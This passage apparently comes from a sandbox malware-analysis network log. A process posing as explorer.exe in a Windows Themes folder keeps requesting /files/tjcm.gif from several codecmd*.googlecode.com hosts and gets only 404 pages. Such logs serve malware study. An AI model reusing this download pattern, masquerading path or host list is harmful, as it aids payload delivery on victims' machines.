(min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:01.843492985 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              78192.168.2.651229173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:02.593338966 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:03.339191914 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:03 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:03.339255095 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              79192.168.2.651230142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:03.644686937 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:04.882050037 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:04 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:04.882144928 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:10:04.882178068 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:10:04.882215977 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:04 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:04.887335062 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              80192.168.2.65123164.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:05.197572947 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:05.913415909 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:05 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:05.913558006 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              81192.168.2.651232173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:06.370016098 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:07.085896015 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:06 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:07.085947990 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              82192.168.2.651233142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:07.484443903 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:08.195652962 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:08 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:08.195699930 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              83192.168.2.65123464.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:08.428186893 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:09.150588989 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:09 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:09.150620937 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              84192.168.2.651235173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:09.618761063 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
